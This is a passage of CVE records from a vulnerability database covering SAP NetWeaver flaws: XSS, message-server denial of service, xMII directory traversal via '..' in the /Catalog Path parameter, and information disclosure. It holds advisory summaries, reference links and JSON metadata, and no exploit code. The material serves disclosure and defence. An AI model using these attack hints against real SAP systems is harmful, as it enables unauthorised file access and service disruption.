"name": "https://launchpad.support.sap.com/#/notes/3084937",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3084937"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2021-38183",
"datePublished": "2021-10-12T14:04:07",
"dateReserved": "2021-08-07T00:00:00",
"dateUpdated": "2024-08-04T01:37:16.304Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-33984
Vulnerability from cvelistv5
Published
2023-06-13 02:44
Modified
2025-01-03 02:04
Severity ?
EPSS score ?
Summary
SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver (Design Time Repository) |
Version: 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:54:14.117Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3318657"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-33984",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-03T02:04:39.210949Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-03T02:04:56.593Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Design Time Repository)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-06-13T02:44:24.041Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3318657"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability in NetWeaver (Design Time Repository)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-33984",
"datePublished": "2023-06-13T02:44:24.041Z",
"dateReserved": "2023-05-24T20:41:32.833Z",
"dateUpdated": "2025-01-03T02:04:56.593Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-1593
Vulnerability from cvelistv5
Published
2020-01-23 19:46
Modified
2024-08-06 15:04
Severity ?
EPSS score ?
Summary
A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/57956 | x_refsource_MISC | |
| http://www.securitytracker.com/id/1028148 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/82065 | x_refsource_MISC | |
| https://packetstormsecurity.com/files/cve/CVE-2013-1593 | x_refsource_MISC | |
| https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T15:04:49.468Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1593"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-23T19:46:38",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/bid/57956"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securitytracker.com/id/1028148"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1593"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-1593",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.securityfocus.com/bid/57956",
"refsource": "MISC",
"url": "http://www.securityfocus.com/bid/57956"
},
{
"name": "http://www.securitytracker.com/id/1028148",
"refsource": "MISC",
"url": "http://www.securitytracker.com/id/1028148"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"name": "https://packetstormsecurity.com/files/cve/CVE-2013-1593",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1593"
},
{
"name": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-1593",
"datePublished": "2020-01-23T19:46:38",
"dateReserved": "2013-02-04T00:00:00",
"dateUpdated": "2024-08-06T15:04:49.468Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-1963
Vulnerability from cvelistv5
Published
2014-02-14 15:00
Modified
2024-08-06 09:58
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91097 | vdb-entry, x_refsource_XF | |
| https://service.sap.com/sap/support/notes/1773912 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/56947 | third-party-advisory, x_refsource_SECUNIA | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.729Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netweaver-message-server-dos(91097)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1773912"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netweaver-message-server-dos(91097)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1773912"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1963",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netweaver-message-server-dos(91097)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"name": "https://service.sap.com/sap/support/notes/1773912",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1773912"
},
{
"name": "56947",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56947"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1963",
"datePublished": "2014-02-14T15:00:00",
"dateReserved": "2014-02-14T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.729Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-1911
Vulnerability from cvelistv5
Published
2016-01-15 20:00
Modified
2024-08-05 23:10
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2016/Apr/64 | mailing-list, x_refsource_FULLDISC | |
| http://seclists.org/fulldisclosure/2016/Apr/58 | mailing-list, x_refsource_FULLDISC | |
| https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/ | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/ | x_refsource_MISC | |
| https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:10:40.365Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20160420 [ERPSCAN-16-004] SAP NetWeaver 7.4 (Pmitest servlet) - XSS vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/64"
},
{
"name": "20160415 [ERPSCAN-16-001] SAP NetWeaver 7.4 - XSS vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/58"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20160420 [ERPSCAN-16-004] SAP NetWeaver 7.4 (Pmitest servlet) - XSS vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/64"
},
{
"name": "20160415 [ERPSCAN-16-001] SAP NetWeaver 7.4 - XSS vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Apr/58"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1911",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20160420 [ERPSCAN-16-004] SAP NetWeaver 7.4 (Pmitest servlet) - XSS vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Apr/64"
},
{
"name": "20160415 [ERPSCAN-16-001] SAP NetWeaver 7.4 - XSS vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Apr/58"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"name": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1911",
"datePublished": "2016-01-15T20:00:00",
"dateReserved": "2016-01-15T00:00:00",
"dateUpdated": "2024-08-05T23:10:40.365Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-2389
Vulnerability from cvelistv5
Published
2016-02-16 15:00
Modified
2024-08-05 23:24
Severity ?
EPSS score ?
Summary
Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2016/May/40 | mailing-list, x_refsource_FULLDISC | |
| http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html | x_refsource_MISC | |
| https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/ | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/39837/ | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:24:49.295Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20160517 [ERPSCAN-16-009] SAP xMII - directory traversal vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/May/40"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"name": "39837",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/39837/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-02-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20160517 [ERPSCAN-16-009] SAP xMII - directory traversal vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/May/40"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"name": "39837",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/39837/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-2389",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20160517 [ERPSCAN-16-009] SAP xMII - directory traversal vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/May/40"
},
{
"name": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html"
},
{
"name": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"name": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"name": "39837",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/39837/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-2389",
"datePublished": "2016-02-16T15:00:00",
"dateReserved": "2016-02-16T00:00:00",
"dateUpdated": "2024-08-05T23:24:49.295Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-0248
Vulnerability from cvelistv5
Published
2019-01-08 20:00
Modified
2024-08-04 17:44
Severity ?
EPSS score ?
Summary
Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/106471 | vdb-entry, x_refsource_BID | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2723142 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||
|---|---|---|---|---|---|---|---|
| ▼ | SAP SE | SAP Gateway of ABAP Application Server(SAP_GWFND) |
Version: < 7.5 Version: < 7.51 Version: < 7.52 Version: < 7.53 |
||||
|
|||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T17:44:16.209Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "106471",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/106471"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2723142"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP Gateway of ABAP Application Server(SAP_GWFND)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.5"
},
{
"status": "affected",
"version": "\u003c 7.51"
},
{
"status": "affected",
"version": "\u003c 7.52"
},
{
"status": "affected",
"version": "\u003c 7.53"
}
]
},
{
"product": "SAP Gateway of ABAP Application Server(SAP_BASIS)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.5"
}
]
}
],
"datePublic": "2019-01-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Information Disclosure",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-01-09T10:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"name": "106471",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/106471"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2723142"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2019-0248",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP Gateway of ABAP Application Server(SAP_GWFND)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.5"
},
{
"version_name": "\u003c",
"version_value": "7.51"
},
{
"version_name": "\u003c",
"version_value": "7.52"
},
{
"version_name": "\u003c",
"version_value": "7.53"
}
]
}
},
{
"product_name": "SAP Gateway of ABAP Application Server(SAP_BASIS)",
"version": {
"version_data": [
{
